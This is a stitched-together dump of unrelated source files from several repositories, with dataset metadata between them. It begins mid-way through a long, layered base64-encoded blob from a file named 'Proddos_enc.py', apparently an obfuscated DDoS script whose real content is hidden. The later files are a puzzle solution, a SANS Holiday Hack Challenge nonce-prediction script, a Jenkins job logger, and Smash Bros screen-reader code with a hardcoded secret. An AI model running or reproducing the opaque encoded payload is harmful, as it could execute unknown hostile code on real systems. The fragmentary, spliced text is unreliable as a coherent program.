1VtRlNla1pNVmxkemVGSnRVa1pqUlRWVFZrWldOVlpxU2pCaE1WcHpZak5vV0dFeWFIQlZNRnBMWVVaYVYxVnJUbFZTYlZJd1ZHeFdNR0V5U2xaalJsWldWbnBGZDFZeWVHdFNNVTUxVkcxR1UxWXhTalpYYTFaaFpERmFSMUp1VmxKaVYzaFpWV3hXZG1WV1pGVlRWRVpXWWtjNU5Ga3dWbTlWTWtaeVUyMW9WMDFHY0V4YVJFWnpZekZ3UjFkc1ZtaE5SRlYzVmtkNGIxbFhSWGxXYkZwVFZrWmFWVlpzWkZOV1JteFdXa1pPVkZKc2NIaFZWekZ2VmpKV2NsZHVjRmRTVjA0elZGWmtVMlJHVm5GV2JVWk9UVVZ3UjFac1dtOVJNbEp6WWtoR1ZXSkhVbk5XYkdRMFVteFNWbHBIZEdoV01IQldXVlJPZDFaV1NqWlNibHBoVW5wR1ZGWXhXazlXYXpWV1ZXMXNWMUpXYjNwV01XTjNUVlpaZDAxVlpHcFNiRXBUVm10a05GTXhWb
lZqUm1ST1lraENTbGxZY0VkaE1VbDNWMnhzVldKR1NraFpWRVpLWlVaYWNrOVdTazVoYTFwVlYxWldhMVl4V2tkU2JGWnBVbGhDVkZwWGVGcGxWbVJ5WVVoS1RsWXdWalJaYTFwellVVXhSVlpyVmxwaVJrcElWRmQ0YzJSRk5WZFViV3hPVWpOb1IxWkdWbXRoTWtaWVUyeFdhRTB6UWxaVmJuQkRUa1p3U0UxVmRHdFdiRm93VkRGV1YxWnNaRVpTV0doWFRXNW9jbFZxU2xkV2JVcEdWbXMxVTAxc1NuZFhWM2hUWTIxV2MxVnJhRTlYUlRWd1ZXMHhORmRzVlhoV1ZFWlRVbTVCTWxWWGREUldSbVJJWlVVNVdsWXpVbnBVYkZwVFYwZE9SbU5IZUZkV1JWbzBWbFJHYjJNeFVuUlNia3BwVWtaYVZsWnNVbGRTVm14MFkzcEdUbUpIVWxaVk1qVjNXVlV4VmxOc1ZsWldlbFl6V1ZaVmVHTnJOVmxpUm1ocFVqSm9WRmRyV210VWJWWldUMVpvYWxJeWFFOVphMXB6VFRGV05sRnRPVlZOYkVwNldWUk9jMkV4U1hwaFNFcFdWMGhDV0ZWVVJsZGtSMUkyVm14U2FWSnJjRFZXYlRFMFZqRlNWMUpZWkZSaGJIQmhXVmQwZDFWR2EzbGxTR1JZVm14YVdsWnRlR0ZVYkVwSVpVVmFWMWRJUWtkVWJGcExWakZPV1dGR1VtaE5TRUpYVm14U1MwMUdVWGhTV0d4T1ZsaFNVRlpxUmt0VFZscDBUbGhrVkdKRmNFWlZWekF4VjJzeGNWSnJhR0ZTYkhBelZUQlZOVmRXVm5KTlYyeFRVak5STUZZeFVrcGxSa2w1Vld4a2FsSlhhRkZXTUZwTFZGWldjbFpzV210TlZrWTBWbGQwUzJGc1NsZFRiRTVhWVd0d00xVXlNVmRXYXpGWlVteFNXRkl6YUZCWFZtUXdZekExVjFWc2FHcFNXRUp6Vm14U1IyVkdWbkpYYTJScllrWktlVlpITlZOVlJtUkpVV3MxV21KWVRYZFVWbHB6VG14U2MxUnRiRk5OU0VKV1ZqSndTMk14WkhKTldGWm9VMFUxV1ZadE1XOVRNV3hYVm1wQ1ZtRjZSa2RhUldSelZHc3hSVkpZYUZoWFNFSlFXWHBLVjJSR1ZuSmhSbVJwWWtWd1RsWldVa05rTWxKSFlrWmtZVkl6VW5GVVZtaERWMnhhVjFwSGRGWk5WWEJZVlRKd1MxZHJNSGxsUlZKV1ZucEdWRlV4V2xka1IwWkhZMFUxYVdGNlZqTldXSEJIVW0xUmVGUlliRlZoTW5oVldXMTBTMk5HYkhSbFJXUlZUVlZXTlZSc1ZrOWlSbGwzVjJ4c1ZXSkdTa1JWTW5oR1pESk9SbFJ0UmxOaVYyaFZWMWR3UzFOdFZuTlViR2hoVWxoQ1UxUlZWbFpsVmxWNFZteGtWazFXUmpOWmExWmhWR3hhY2xOc1VsWmlWRUV4V1RCYVMxSXhTblZhUjNST1lYcFZkMWRYZEc5V01rVjRVbGhrVTJKclNsaFVWbVJPVFZaU1YxWnVUbE5OVmxwNFZXMTRkMkZXV25OWGJsWlhVa1Z3ZWxWVVJrdFdNVloxVVd4S2FHVnNXbGRXUmxaaFV6SkdSMVJzYUZwTk1sSlZWRmR6TVZOc1ZYbE9WVTVvVmpCd2VsVnRNREZXUmxsNlZXMW9XbFpXY0hsYVZscGhaRWRLU0dKRk5XaGlXR2N4VmxSR1YxVXlVWGhYYTJScFVtMW9WMVpxU2xOV01WSldWbTVPYVdKRk5WbFhWRTVyVmtVeGNrNVZjRlpOYWxaRVdWWmtTMk14U25KUFZrcE9ZV3RhTmxkclVrTmpNVXBXVFZWb1lWSXpRbkJXYkZwelRteFpkMVZyZEdwTmJFcFpWa2QwYzFZeVJuSlRhekZXVmtWS00xVjZSbUZXYkZKeVZHeGtWM
kpZYUdGV1ZFbDNUVlpzVjFwRlpGTmlWRlpXVkZjeE5GRXhiRmRXYWtKV1lYcEdSMXBGWkhkVk1sWjBaSHBHV0dFeFdsQlZWM00xVm0xS1JtRkhiRlJTYkhCNFZsUkNZVmR0VVhoVVdHUlZZVE5TVjFacVFuTk9iRlY1WTBWT1ZHSkZWak5WYlRBeFZrWmFWazVWVGxoaGEwcDZWV3hrU21WV2NFWmpSMmhYVFRGS1VWWldVa3RoYlZGNFZGaHNWRmRJUWxaV01GcGhZMVpTVlZOcVVrOWlTRUpIVjJ0YWEyRXhTbGxWYTFaV1RXcEdNMWxXV2twbFJtUjBUMVp3VG1KWWFFeFhWRUpYVlRGV2RGUnJiRmhpV0VKelZtdGFXazFzWkhOWGJUbFZUVVJHU0Zrd1dtOVViRW8yWWtWMFdtSkdjRE5hUkVaclkxWk9jVlZ0YkZOTlZYQkdWbFprTUZNeVJYaFVhMlJVWWxSc1dWWnJWbmRPYkdSeFVteGFiR0pHV2pCWlZXUjNZVmRLUm1ORVRsaFdla0kwV1ZjeFIxWnRVa2RUYXpWVFYwWktlRlpVUWxka01sRjRZa2hTVDFacmNHaFVWV1EwWld4c05sTnRkRlJpUlZZelZXMHdNVlpHV2xaT1ZVNVlZV3RLZWxWcldrZFhSbkJHWTBaS1RsSldjREZXVkVaWFZERkdjMkl6WkdsU1ZrcFRWbXBLVTFNeFZuUmpSVTVwWWtaS1YxWkhlR0ZaVlRGSVpVaFdWVlpXV1hkWlZFWktaVmRXUlZGc2FHbFNWRUkwVjJ4amVGTXhUa2RYYmxKc1VqTkNVMVJYTVU5T1JsWTJVbXRhYTAxVk1UVldSM1J6VmtkS2NsTnVRbHBpV0doSVdXMTRUMWRIVmtsalJrSlhZVEJ3VjFaR1ZsTmpNVlpYVmxoa1UySlVWbFZXYkZVeFVURmtjVkZ1VGxOU2ExcFpWMnRXZDFWck1VWlhibFpXVFZaYVVGVlhlSFprTWtwR1drVTFVMDFzU2xCWFZtUTBWakpOZUZSc2FGcE5NbEpWVkZkNFMxTldiSEpoUms1YVZteFpNbFp0Y0dGWGJVVjVWV3hvV21FeVVsQlZhMXAzVG14S2NtVkdXbGRTVlhCT1ZqRlNRMkl4VFhsVWEyaFVZbXhhVjFacVNsTlRNV3h5WVVVMVQxWnNXa2hXVm1oclZVWmFjbE5zV2xWV1ZrcDZWbFphWVZKV1JsVldiRkpYVmxSV1JGWXljRU5qTVVwSFVteG9ZVkpZUWxOVVZWWmhaRlpWZUZac2NHdE5Wemt6Vkd4YVYxVnNXWHBoUlhSWVltNUNSRlpGV25kU2JIQkpWRzEwVTJKclNsWldSM2h2WkRKR1YxTllhRmhpYXpWaFZGVlZNV1JXVWxkV2FrSldZWHBHUjFwRlpIZFdSa3BaVVdwT1dGWjZRWGhXVjNoMlpESktTVlJ0Y0d4aVdHaFRWbTEwVTFGck5WZFdhMlJXVjBkU1VWWnRkRXRXYkZKV1ZXNU9WbFpzY0VaVlZsSlhWbXhLYzFKcVRsaGhhMHA2Vld0YVIxZEdjRVpqUms1b1lUQndNVlpyWXpGa01WcDBVMnRhYVZKNlZrOVZiR2hUWTJ4V2NWTnFVazVTYlZKNlZrWlNSMkpIU2xaalJXeFhZbFJGTUZsWGVFWmxWbXQ2WVVaU1RsWldXWHBXV0hCTFZERk9WMVJ1VmxKaVYzaHdXV3RXWVdSV1ZYaGFSRkpzWVhwc1dGVlhlRmRVYkVwSVpVWktWMkV4U2tOVWJGcFhVakZXV1ZwR1FsZGhNSEJYVmtaV1UyTXhWbGRYYTFaU1ZrWmFWMVZ0ZUVkTk1WRjRWMnRPVjAxRVJrbFhhMVV4VmpGS1ZsZFljRlpOYm1oUVZUSjRVMk5zVW5WV2JGcHBZVEJ3ZDFadGNFZFdNREZYWWtSYVZHRnNTbkJWYlRWRFYyeFdWMWw2VmxWaVZscFpXa
1ZWTlZWck1YRldiRUphWVRKU1RGcEdXbGRYUm5CSFVteGFUbEpXYkRaV1YzUmhVakpSZDAxSWJGTmhNbWh3VlRCVk1XRkdXbFZSYTNSWFlrZDBOVlJzV210aFZrcFZZa2hXVlZaV1dYZFZNbmhHWkRGS2RFNVdVbGRXVkZaRlYyeGplRk50VmxkVmJsWlVZWHBHY0ZsWWNGZGxiR1JZVFVob1ZrMUVSa2xWTW5CWFlVWkplV1ZJVGxkTlJuQk1XWHBHY21WdFNrVlViVVpPVTBaS1NsZFhkRzloTVZKWFZHdGFWR0ZyY0dGVVYzQlhWVEZyZDFacVFsWmhla1pIV2tWV2QxVnJNVVpYYmxaV1RWWmFVRlZVU2xkak1rNUhZVVU1VjFKVmNFeFdWM1JUVVRKS2MySkVXbFJpUjFKeVZtcEdTMUpXVmxkaFJYUlVZa1Z3UjFadGN6VlZhekYwWlVWT1dHRnJTbnBWYTFwSFYwWndTR05HVG14aVdHTjRWakowVjFReFJuSlBWbHBwVWxkNFUxbHRlSGRqVm14MFpVVmthV0pGTVRaWmExWkxZa1pLVjFOc1RscGhhM0J5VlRKNFJtUXhTblJPVmxKWFZqSm9SVmRzV210U01XUkdUbFpXVW1FelFsTlVWV2hEVm14WmVXVkhjRTVXVkVaSFdXdFdVMVl5U25WUmEzUldUVVphVEZscVJtdFdWazV4VVcxc1UwMVZjRVpXVm1SM1VUSkdXRlpzV2xOaWF6VmhWRlJLTkZKR1VsWmFSV1JVVm1zMU1WWXlNVEJXTURGelUycEtXR0V4V2xCVlZFcFNaVlpPV1dOR1VtaGhNSEJTVjFaYVlWbFZOWE5VYkdocFVteHdjRlJYYzNoT1ZscDBUbFprYUUxVlZqWlpWV2hyVjJzeFJrNUVRbUZTUlhCTFdsZDRUMk5XUm5KbFJscFhVbFZ3VGxaVVJsZFVNVVp6WWpOa2FWSldTbE5aYlhSTFlVWnNWMVpyZEU1TlYzaDRWa2QwTUZSc1NsaGxSVnBWVmxaS2VsVXllRXRTTWtWNllVWldhVkpyY0ZCV1JsWldUbGRLY2sxVldtdFNXRUpUVkZWV1lXUldWWGhXYXpsU1lrYzVNMWxyVm5OVmJVcHpZMGhHV21KWWFFaFpiWGhYVWpGU2NsTnRlRkpOUjNnelZYcEdSazlXUWxSVFdFSk1WVlF3T1VscGEzQWlLU2s9Iikp"))"))
Python
12
31.75
51
/Proddos_enc.py
0.545918
0.482143
kratikagupta-developer/NewsLetter-SignupApp
refs/heads/master
# your code goes here import collections T = int(input()) print (T) while T>0: n,g,m = map(int,input().split()) print (n,g,m) dict = collections.defaultdict(set) c = 1 ### guest no. t = 1 li = [-1] while c <=g: h,direction = input().split() print (h,direction) h = int(h) #h,direction = astr.split() li.append((h,direction)) dict[h].add(c) print (dict) c+=1 while t<=m: c = 1 temp_d = collections.defaultdict(set) while c<=g: h,direction = li[c] h = int(h) if direction == 'C': end = (h+1)%n else: end = (h-1) if end<=0: ####3 end = n+end temp_d[end].add(c) c+=1 for i,v in temp_d.items(): dict[i].union(v) ################ t+=1 dict2 = collections.OrderedDict() for i,v in dict.items(): for elem in v: if elem not in dict2: dict2[elem]=1 else: dict2[elem]+=1 li1 = [] print (dict2) for i in range(g+1): if i+1 in dict2: li1.append(dict2[i+1]) print (li1) T-=1
Python
55
22.709091
45
/Untitled-1.py
0.409509
0.388037
mendedsiren63/2020_Sans_Holiday_Hack_Challenge
refs/heads/main
#!/usr/bin/python3 import os main_nonce="nonce" obj_file_new_nonce="obj_new_nonce_624" cmd_cut='cat nonce | tail -312 > obj_nonce_312' nonce_combined_list=[] def split_nonce(): os.system(cmd_cut) #This block will cut 312 nonce from main file and put in last nonce_312 file_nonce="obj_nonce_312" with open(file_nonce, "r") as file: # Calculate hi and lo 32 bit of 64 bit nonce. for line in file.readlines(): line=int(line) highint = line >> 32 #hi lowint = line & 0xffffffff #lo with open (obj_file_new_nonce, 'a') as file: #Add nonces to a new file making it 624 values. file.write(str(lowint)+'\n') with open(obj_file_new_nonce, 'a') as file: file.write(str(highint)+'\n') def predict(): try: os.system('cat obj_new_nonce_624 | mt19937predict | head -20 > obj_pred_10.txt') # Using Kmyk's Mersenne twister Predictor except Exception as e: # This will through a broken pipe exception but it will successfully predict 10 next nonces pass with open('obj_pred_10.txt', 'r') as file: nonce_array = file.readlines() for i,j in zip(range(0,len(nonce_array),2), range(129997,130007)): # if i <len(nonce_array)-1: nonce_lo=int(nonce_array[i]) # Converting back to 64 bit. nonce_hi=int(nonce_array[i+1]) nonce_combined=(nonce_hi <<32) + nonce_lo hex_nonce=hex(nonce_combined) print("Predicted nonce at",j,"is:", nonce_combined, " [ Hex value:",hex_nonce,"]") #Printing the nones and their hex value split_nonce() predict()
Python
43
34.279068
127
/Bitcoin-Investigation/process_nonce_obj_11a.py
0.664915
0.622208
remiljw/Python-Script
refs/heads/master
import requests import jenkins from sqlalchemy import * from sqlalchemy.ext.declarative import declarative_base from sqlalchemy.orm import sessionmaker import datetime Base = declarative_base() def connectToJenkins(url, username, password): server = jenkins.Jenkins(url, username=username, password=password) return server def initializeDb(): engine = create_engine('sqlite:///cli.db', echo=False) session = sessionmaker(bind=engine)() Base.metadata.create_all(engine) return session def addJob(session, jlist): for j in jlist: session.add(j) session.commit() def getLastJobId(session, name): job = session.query(Jobs).filter_by(name=name).order_by(Jobs.jen_id.desc()).first() if (job != None): return job.jen_id else: return None class Jobs(Base): __tablename__ = 'Jobs' id = Column(Integer, primary_key = True) jen_id = Column(Integer) name = Column(String) timeStamp = Column(DateTime) result = Column(String) building = Column(String) estimatedDuration = Column(String) def createJobList(start, lastBuildNumber, jobName): jList = [] for i in range(start + 1, lastBuildNumber + 1): current = server.get_build_info(jobName, i) current_as_jobs = Jobs() current_as_jobs.jen_id = current['id'] current_as_jobs.building = current['building'] current_as_jobs.estimatedDuration = current['estimatedDuration'] current_as_jobs.name = jobName current_as_jobs.result = current['result'] current_as_jobs.timeStamp = datetime.datetime.fromtimestamp(long(current['timestamp'])*0.001) jList.append(current_as_jobs) return jList url = 'http://locahost:8080' username = input('Enter username: ') password = input('Enter password: ') server = connectToJenkins(url, username, password) authenticated = false try: server.get_whoami() authenticated = true except jenkins.JenkinsException as e: print ("Authentication error") authenticated = false if authenticated: session = initializeDb() # get a list of all jobs jobs = server.get_all_jobs() for j in jobs: jobName = j['name'] # get job name #print jobName 
lastJobId = getLastJobId(session, jobName) # get last locally stored job of this name lastBuildNumber = server.get_job_info(jobName)['lastBuild']['number'] # get last build number from Jenkins for this job # if job not stored, update the db with all entries if lastJobId == None: start = 0 # if job exists, update the db with new entrie else: start = lastJobId # create a list of unadded job objects jlist = createJobList(start, lastBuildNumber, jobName) # add job to db addJob(session, jlist)
Python
94
29.404255
129
/jenkins_jobs.py
0.662351
0.658502
badgerlordy/smash-bros-reader
refs/heads/master
import argparse import cv2 import difflib import json import matplotlib.pyplot as plt import mss import numpy as np import os import re import requests import select import smash_game import smash_utility as ut import socket import struct import threading from queue import Empty, Queue #from matplotlib import pyplot as plt from PIL import Image, ImageChops, ImageDraw BASE_DIR = os.path.realpath(os.path.dirname(__file__)) CAPTURES_DIR = os.path.join(BASE_DIR, 'captures') if not os.path.isdir(CAPTURES_DIR): os.mkdir(CAPTURES_DIR) def post_fake(data={'mode': 1, 'game': {'players': []}}): ut.post_data(data) def test_pixel(): img = Image.open('1560221662.467294.png') img = ut.filter_color2(img, (0, 10)) p = plt.imshow(img) plt.show() def test_stencil(): img = Image.open('1560219739.917792.png') ut.stencil(img) def test_game_data(): with open('game_state.json', 'r') as infile: game = json.load(infile) ut.filter_game_data(game, 1) def req(message='No message'): URL = 'http://localhost:8000/reader_info/' DATA = { 'secret_code': 'Mj76uiJ*(967%GVr57UNJ*^gBVD#W4gJ)ioM^)', 'data': message } r = requests.post(url = URL, json = DATA) return r class KeyThread(threading.Thread): def __init__(self, *args, **kwargs): super().__init__() self.key = keyboard.KeyCode(char='g') def run(self): with keyboard.Listener(on_press=self.on_press) as listener: listener.join() def on_press(self, key): if key == self.key: print('test') def start_key_thread(): thread = KeyThread() thread.daemon = True thread.start() def fight_tester(): captures = os.listdir(CAPTURES_DIR) get_fight_num = lambda f: re.match('\d+', f).group() fight_nums = list({get_fight_num(f) for f in captures}) fight_nums.sort(key=lambda n: int(n)) # n = fight_nums[int(random.random() * len(fight_nums))] # n = '0001' modes = {} for i, n in enumerate(fight_nums[16:]): print(f'{"*" * 80}\n{n}') card_screen = Image.open(os.path.join(CAPTURES_DIR, n + '.2.LOBBY_CARDS.png')) fight_start_screen = Image.open(os.path.join(CAPTURES_DIR, n + 
'.3.FIGHT_START.png')) # fight_end_screen = Image.open(os.path.join(CAPTURES_DIR, n + '.4.FIGHT_END.png')) # try: # fight_results_screen = Image.open(os.path.join(CAPTURES_DIR, n + '.5.FIGHT_RESULTS_SOLO.png')) # except FileNotFoundError: # fight_results_screen = Image.open(os.path.join(CAPTURES_DIR, n + '.5.FIGHT_RESULTS_TEAM.png')) game = smash_game.Game(1) game.read_card_screen(card_screen) if game.mode in modes: modes[game.mode].append(i) else: modes[game.mode] = [i] break for mode in modes: print(f'{mode}: {modes[mode]}') game.read_start_screen(fight_start_screen) print(game.serialize(images_bool=False)) # game.fix_colors(fight_start_screen) # game.read_end_screen(fight_end_screen) # game.read_results_screen(fight_results_screen) # print(str(game)) # with open('game.json', 'w+') as outfile: # json.dump(game.serialize(), outfile, separators=(',',':')) def crop_char_lobby(): cap = ut.capture_screen() game = smash_game.Game(1) game.player_count = 4 game.read_cards(cap) def crop_char_game(): cap = ut.capture_screen() game = smash_game.Game(1) game.player_count = 3 name_images = game.get_character_name_game(cap) for img in name_images: bw, _ = ut.convert_to_bw(img) name_as_read = ut.read_image(bw).lower() name = difflib.get_close_matches(name_as_read, smash_game.CHARACTER_NAMES, n=1) print(name) def filter(): plt.ion() while True: cap = ut.capture_screen() img = ut.filter_color(cap, [236, 236, 236]) plt.imshow(img) plt.pause(0.001) plt.show() def cropper(coord_name, name=None): coords = ut.COORDS['FINAL'][coord_name] capture = ut.capture_screen() crop = capture.crop(coords) if name: crop.save(f'{name}.png') else: return np.asarray(crop) # crop.show() def capture_screen(): with mss.mss() as sct: # Get rid of the first, as it represents the "All in One" monitor: #for num, monitor in enumerate(sct.monitors[1:], 1): monitor = sct.monitors[1] # Get raw pixels from the screen sct_img = sct.grab(monitor) # Create the Image img = Image.frombytes('RGB', sct_img.size, 
sct_img.bgra, 'raw', 'BGRX') # The same, but less efficient: # img = Image.frombytes('RGB', sct_img.size, sct_img.rgb) num = 0 name = os.path.join(home, 'screens', f'{num}.png') while os.path.isfile(name): num += 1 name = os.path.join(home, 'screens', f'{num}.png') return img def get_stream(): port = 9999 # where do you expect to get a msg? bufferSize = 2048 # whatever you need s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.bind(('', port)) s.setblocking(0) if True: result = select.select([s],[],[]) msg = result[0][0].recv(bufferSize) print(msg) cap = ImageGrab.grab() cv2.imdecode(cap, flags=1) def get_stream2(): HOST = '' PORT = 9999 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print('Socket created') s.bind((HOST, PORT)) print('Socket bind complete') s.listen(10) print('Socket now listening') conn, addr = s.accept() while True: data = conn.recv(8192) nparr = np.fromstring(data, np.uint8) frame = cv2.imdecode(nparr, cv2.IMREAD_COLOR) cv2.imshow('frame', frame) time.sleep(2) def get_stream3(): MCAST_GRP = '224.1.1.1' MCAST_PORT = 9999 IS_ALL_GROUPS = True sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) if IS_ALL_GROUPS: # on this port, receives ALL multicast groups sock.bind(('', MCAST_PORT)) else: # on this port, listen ONLY to MCAST_GRP sock.bind((MCAST_GRP, MCAST_PORT)) mreq = struct.pack("4sl", socket.inet_aton(MCAST_GRP), socket.INADDR_ANY) sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq) while True: print(sock.recv(10240)) def get_stream_data(main_queue, image_queue): print('Getting stream data') cap = cv2.VideoCapture('udp://224.0.0.1:2424', cv2.CAP_FFMPEG) print(cap) if not cap.isOpened(): print('VideoCapture not opened') exit(-1) x = 0 while True: print('cap') image_queue.put(cap) print('put') item = get_queue(main_queue) if item == 'end': break cap.release() cv2.destroyAllWindows() def convert_to_bw(pil_img, threshold=127): cv_img = 
np.array(pil_img) img_gray = cv2.cvtColor(cv_img, cv2.COLOR_BGR2GRAY) thresh, array_bw = cv2.threshold(img_gray, threshold, 255, cv2.THRESH_BINARY_INV) pil_bw = Image.fromarray(array_bw) return pil_bw, array_bw def compare(): imgs = os.listdir(os.path.join(home, 'flags')) [print(f'{str(i+1).rjust(2)}. {img}') for i, img in enumerate(imgs)] #x = 0 while True: first = int(input('one>: ')) img1 = Image.open(os.path.join(home, 'flags', imgs[first-1])) print(img1) second = int(input('two>: ')) img2 = Image.open(os.path.join(home, 'flags', imgs[second-1])) print(img2) #small, large = sorted([img1, img2], key=lambda img: img.size[0]) copy1 = img1.resize((64, 64)) copy2 = img2.resize((64, 64)) bw1, arr1 = convert_to_bw(copy1) bw2, arr2 = convert_to_bw(copy2) diff = ImageChops.difference(bw1, bw2) diff.show() arr = np.asarray(diff) total = 0 different = 0 for row in arr: for pixel in row: total += 1 if pixel == 255: different += 1 sim = ((1 - (different/total)) * 100) print(sim) if sim < 98: print('different flag') else: print('same flag') #diff.save(f'diff-{x}.jpg') #x += 1 def get_queue(queue): try: item = queue.get(block=False) return item except Empty: return None class ImageProcessingThread(threading.Thread): def __init__(self, main_queue, queue): super().__init__() self.queue = queue self.main_queue = main_queue self.x = 0 print('Image processing thread started') def run(self): while True: cap = get_queue(self.queue) if cap: self.process_frame(cap) def process_frame(self, cap): ret, frame = cap.read() if not ret: print('frame empty') main_queue.put('end') flipped = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) img = Image.fromarray(flipped) img.save(os.path.join('test', f'{self.x}.jpg')) self.x += 1 #cv2.imshow('image', frame) if cv2.waitKey(1)&0XFF == ord('q'): main_queue.put('end') pass def thread_test(): main_queue = Queue() processing_queue = Queue() processing_thread = ImageProcessingThread(main_queue, processing_queue) processing_thread.daemon = True 
processing_thread.start() print('test') get_stream_data(main_queue, processing_queue) def ocr_test(): # construct the argument parse and parse the arguments ap = argparse.ArgumentParser() ap.add_argument("-i", "--image", required=True, help="path to input image to be OCR'd") ap.add_argument("-p", "--preprocess", type=str, default="thresh", help="type of preprocessing to be done") args = vars(ap.parse_args()) # load the example image and convert it to grayscale image = cv2.imread(args["image"]) gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) # check to see if we should apply thresholding to preprocess the # image if args["preprocess"] == "thresh": gray = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1] # make a check to see if median blurring should be done to remove # noise elif args["preprocess"] == "blur": gray = cv2.medianBlur(gray, 3) # write the grayscale image to disk as a temporary file so we can # apply OCR to it #filename = "{}.png".format(os.getpid()) #cv2.imwrite(filename, gray) pil_gray = Image.fromarray(gray) # load the image as a PIL/Pillow image, apply OCR, and then delete # the temporary file text = pytesseract.image_to_string(pil_gray) #os.remove(filename) print(text) # show the output images cv2.imshow("Image", image) cv2.imshow("Output", gray) cv2.waitKey(0) def game_color(): game = smash_game.Game() game.player_count = 4 img = Image.open(os.path.join('captures', '0001.3.FIGHT_START.png')) for edge in ut.COORDS['GAME']['PLAYER']['INFO'][game.player_count]: color_coords = list(ut.COORDS['GAME']['PLAYER']['COLOR']) color_coords[0] = edge - color_coords[0] color_coords[2] = edge - color_coords[2] crop = img.crop(color_coords) print(ut.match_color(pixel=crop, mode='GAME')) if __name__ == '__main__': #ocr_test() #fight_tester() #test_game_data() #test_stencil() #fight_tester() game_color() pass
Python
440
25.661364
108
/smash_reader/tests.py
0.590913
0.570199
badgerlordy/smash-bros-reader
refs/heads/master
import cv2 from datetime import datetime import json from logger import log_exception import matplotlib.pyplot as plt import mss import numpy as np from PIL import Image, ImageChops, ImageDraw import pytesseract import random import requests from skimage.measure import compare_ssim import string import subprocess import os import sys import time sys.excepthook = log_exception output = True def _print(*args, **kwargs): if output: args = list(args) args.insert(0, '<Utility>') print(*args, **kwargs) BASE_DIR = os.path.realpath(os.path.dirname(__file__)) TEMPLATES_DIR = os.path.join(BASE_DIR, 'templates') override_path = os.path.join(BASE_DIR, 'index.txt') if os.path.isfile(override_path): with open(override_path, 'r') as infile: MONITOR_INDEX = int(infile.read()) else: MONITOR_INDEX = 1 COORDS = { 'LOBBY': { 'BASIC_ID': (145, 32, 321, 70), 'FLAGS_ID': (394, 291, 1525, 433), 'CARDS_ID': (671, 152, 1247, 188), 'GAME_INFO': (302, 217, 1443, 253), 'CHARACTER_TEMPLATE': (144, 126, 206, 218), 'CARDS_SLICE_IDS': (0, 877, 1920, 878), 'CARDS_SLICE_COLORS': (0, 813, 1920, 814), 'PLAYER': { 'TEAM_COLOR': (17, 458, 18, 459), 'CHARACTER_NAME': (0, 367, 396, 430), 'NAME': (129, 436, 389, 475), 'NUMBER': (37, 441, 82, 471), 'GSP': (131, 490, 384, 526) } }, 'GAME': { 'TIMER_PREGAME': (1722, 61, 1798, 89), 'TIMER_VISIBLE': (1703, 63, 1715, 95), 'TIMER_MILLI': ( (1823, 70, 1831, 92), (1850, 70, 1858, 92) ), 'TIMER_MINUTE': (1675, 54, 1686, 91), 'TIMES_UP': (465, 299, 1451, 409), 'SUDDEN_DEATH': (340, 172, 1602, 345), 'END_ID': (411, 462, 1481, 522), 'PLAYER': { 'INFO': { 2: (712, 1451), 3: (457, 1081, 1705), 4: (491, 899, 1307, 1715) }, 'STOCK_TEMPLATE': (223, 1045, 221, 1059), 'CHARACTER_TEMPLATE': (272, 950, 242, 1020), 'NAME': (182, 1007, 0, 1025), 'COLOR': (5, 1003, 4, 1004) } }, 'FINAL': { 'ID': ( (468, 49, 550, 296), (204, 388, 286, 635) ), 'ID2': (1825, 0, 1864, 73), 'VICTORY_TEAM': (745, 870, 833, 978), 'VICTORY_PLAYER': (125, 168, 126, 169), '2ND_PLACE': (525, 982, 526, 983), 
'2ND_PLACE_2_PLAYER': (690, 984, 691, 985), '3RD_PLACE': (1072, 1003, 1073, 1004), '4TH_PLACE': (1492, 1013, 1493, 1014) }, 'MENU': { 'FAILED_TO_PLAY_REPLAY': (724, 408, 1185, 485), 'SPECTATE_SELECTED': (979, 458, 1586, 606) } } COLORS = { 'CARDS':{ 'RED': (250, 52, 52), 'BLUE': (43, 137, 253), 'YELLOW': (248, 182, 16), 'GREEN': (35, 179, 73) }, 'GAME': { 'RED': (255, 42, 40), 'BLUE': (31, 141 ,255), 'YELLOW': (255, 203, 0), 'GREEN': (22, 193, 64) }, 'RESULTS': { 'RED': (240, 159, 163), 'BLUE': (125, 206, 254), 'YELLOW': (255, 244, 89), 'GREEN': (141, 212, 114) } } folders = [f for f in os.listdir(TEMPLATES_DIR) if os.path.isdir(os.path.join(TEMPLATES_DIR, f))] TEMPLATES = {f.upper():{} for f in folders} for root, dirs, files in os.walk(TEMPLATES_DIR, topdown=False): for file in files: path = os.path.join(root, file) name = os.path.splitext(file)[0] _type = os.path.split(root)[1].upper() if _type in TEMPLATES: TEMPLATES[_type][name] = Image.open(path) else: TEMPLATES[_type] = {name: Image.open(path)} def save_settings(settings): lines = [f'{k}={v}' for k, v in settings.items()] open('settings.txt', 'w+').write('\n'.join(lines)) def load_settings(): path = os.path.join(BASE_DIR, 'settings.txt') if os.path.isfile(path): lines = open(path, 'r').read().splitlines() settings = {} for line in lines: k, v = line.split('=') settings[k] = v else: key_path = os.path.join(BASE_DIR, 'key.txt') key = '' if os.path.isfile(key_path): key = open(key_path, 'r').read().splitlines()[0] os.remove(key_path) settings = { 'API_KEY': key, 'POST_URL': 'https://www.smashbet.net/reader_post/', 'AUTO_START_WATCHER': 'true' } save_settings(settings) return settings SETTINGS = load_settings() ##################################################################### ############################# DECORATORS ############################ ##################################################################### def time_this(func): def wrapper(*args, **kwargs): start_time = time.time() result = func(*args, 
**kwargs) end_time = time.time() duration = end_time - start_time dur_str = '{:.2f}'.format(duration) _print(f'function: {func.__name__}() executed in {dur_str} seconds') return result return wrapper # Make sure function runs at least as long as the set interval def pad_time(interval): def outer(func): def inner(*args, **kwargs): start_time = time.time() result = func(*args, **kwargs) end_time = time.time() duration = end_time - start_time delta = interval - duration if delta > 0: # print(f'padding {delta} seconds') time.sleep(delta) else: # print(f'detection has fallen behind by [{"{:.2f}".format(delta)}] seconds') pass return result return inner return outer ##################################################################### ########################## IMAGE CAPTURING ########################## ##################################################################### def save_frames(vid_path, framerate=None): print('saving template in 5 seconds') time.sleep(5) vid_cap = cv2.VideoCapture(vid_path) success = True frame_index = 0 while success: vid_cap.set(cv2.CAP_PROP_POS_FRAMES, frame_index) success, image = 